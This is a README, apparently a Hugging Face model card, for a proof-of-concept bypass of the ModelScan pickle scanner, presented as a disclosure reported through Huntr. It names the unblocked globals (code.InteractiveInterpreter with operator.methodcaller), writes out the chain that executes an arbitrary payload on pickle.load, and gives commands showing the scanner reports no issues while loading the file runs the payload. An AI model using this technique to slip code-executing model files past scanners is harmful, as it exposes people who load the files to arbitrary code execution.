xiaoyaoes's picture
Upload README.md with huggingface_hub
0074a97 verified
|
Raw
History Blame Contribute Delete
1.35 kB
metadata
tags:
  - modelscan
  - picklescan
  - bypass
  - rce
  - proof-of-concept
library_name: generic

ModelScan Bypass PoC: code.InteractiveInterpreter.runsource() + operator.methodcaller()

Overview

This is a proof-of-concept demonstrating a new bypass of ProtectAI ModelScan (v0.8.x), the model scanner used by HuggingFace to detect malicious pickle models.

Bypass Mechanism

ModelScan blocks pickle GLOBAL opcodes for known dangerous modules (os, subprocess, pickle, builtins.eval, etc.) but fails to block code.InteractiveInterpreter and operator.methodcaller.

The exploit chain:

operator.methodcaller("runsource", PAYLOAD)(code.InteractiveInterpreter())
  = code.InteractiveInterpreter().runsource(PAYLOAD)
  = compile(PAYLOAD) + exec(PAYLOAD)

Files

File Format Description
code_bypass.pkl Pickle (v5) Raw pickle file, 171 bytes
code_bypass.joblib joblib .joblib format, 298 bytes

Verification

# Install modelscan
pip install modelscan

# Scan - will report "No issues found"
modelscan --path code_bypass.pkl

# Execute - will run the payload
python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))"

Disclosure

  • Researcher: xiaoyaoes
  • Date: 2026-06-18
  • Status: Reported via Huntr MFV program